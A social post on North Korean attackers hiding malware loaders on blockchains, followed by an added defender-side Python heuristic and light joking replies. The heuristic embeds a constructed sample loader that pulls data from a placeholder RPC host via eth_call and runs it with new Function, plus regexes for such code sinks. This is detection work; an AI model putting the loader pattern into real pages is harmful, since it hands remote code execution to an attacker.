NEW: 🇰🇵 DPRK hackers have begun hiding malware on the blockchain.

Result: decentralized, immutable malware from a government crypto-theft operation.

It only cost $1.37 USD in gas fees per malware change (e.g., to update the command-and-control server).

Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.

And blockchain explorers are a natural target.

Nearly impossible to remove.

Experimentation with putting malware on blockchains is in infancy.

Ultimately there will be some efforts to try to implement social-engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people... whew boy, this gold seam is going to be productive for a long time.

Still, whereas here they used social engineering, I expect attackers to also experiment with directly loading zero-click exploits onto blockchains, targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets.

REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
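As an added, defender-side example (not from the post, and not code from the Google report it links), here is a triage heuristic for the dead-drop pattern the post describes: it flags inline page scripts that read data from a chain (raw JSON-RPC `eth_call` or a web3 library) and then hand the result to a code-execution sink. The RPC host and contract address in the constructed sample page are placeholders.

```python
"""Triage heuristic for the on-chain dead-drop loader pattern: an inline
script that reads bytes from a blockchain and feeds them to a code sink."""
import re

# Constructed sample page; the contract address and RPC host are placeholders.
ADDR = "0x" + "0" * 36 + "1234"
SAMPLE_PAGE = """<html><body>
<script>
  // constructed loader skeleton: eth_call result -> atob -> Function()
  var rpc = "https://rpc.example.invalid";
  var req = {jsonrpc: "2.0", method: "eth_call", id: 1,
             params: [{to: "ADDR_PLACEHOLDER", data: "0x00"}, "latest"]};
  fetch(rpc, {method: "POST", body: JSON.stringify(req)})
    .then(r => r.json()).then(j => { new Function(atob(j.result))(); });
</script>
<script>console.log("benign analytics");</script>
</body></html>""".replace("ADDR_PLACEHOLDER", ADDR)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# Ways a page script reads chain state: raw JSON-RPC methods or web3 libraries.
CHAIN_READ = re.compile(
    r"eth_call|eth_getStorageAt|\.call\(\s*\)|new\s+Web3\s*\(|ethers\.(?:providers|Contract)")
# Sinks that turn fetched data into running code.
EXEC_SINK = re.compile(r"\b(?:eval|Function|setTimeout|setInterval)\s*\(|document\.write\s*\(")
CONTRACT_ADDR = re.compile(r"0x[0-9a-fA-F]{40}\b")
RPC_URL = re.compile(r"""https?://[^\s"'<>]+""")

def score_script(src: str) -> dict:
    """Collect indicators from one script body. Flag only when a chain read
    AND an execution sink co-occur; either alone is common in benign dapps."""
    reads = sorted(set(CHAIN_READ.findall(src)))
    sinks = sorted(set(m.strip("( \t") for m in EXEC_SINK.findall(src)))
    return {
        "reads": reads,
        "sinks": sinks,
        "contracts": sorted(set(CONTRACT_ADDR.findall(src))),
        "rpc_urls": sorted(set(RPC_URL.findall(src))),
        "flagged": bool(reads) and bool(sinks),
    }

def scan_page(html: str) -> list:
    """Return the flagged inline scripts of a page, with their indicators."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        result = score_script(body)
        if result["flagged"]:
            result["script_index"] = index
            findings.append(result)
    return findings
```

The contract addresses and RPC hosts it extracts are what a responder would pivot on next (on-chain reads of that contract, or the same host in proxy logs), which is why the heuristic keeps them rather than just a boolean.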

Discussion

This is also a thing using ordinals - gone are the days when you hafta use finicky DNS and ded servers; set a block hash to load remote exploits and yer off!

Whoa! That's pretty cool.

Are you sure it wasn't Jameson Lopp?

I checked with Core wizards, they said "Whomstever smelteth it, dealteth it!" 💩🪙🧙‍♂️

Checkmate!!!1one 🧐

lol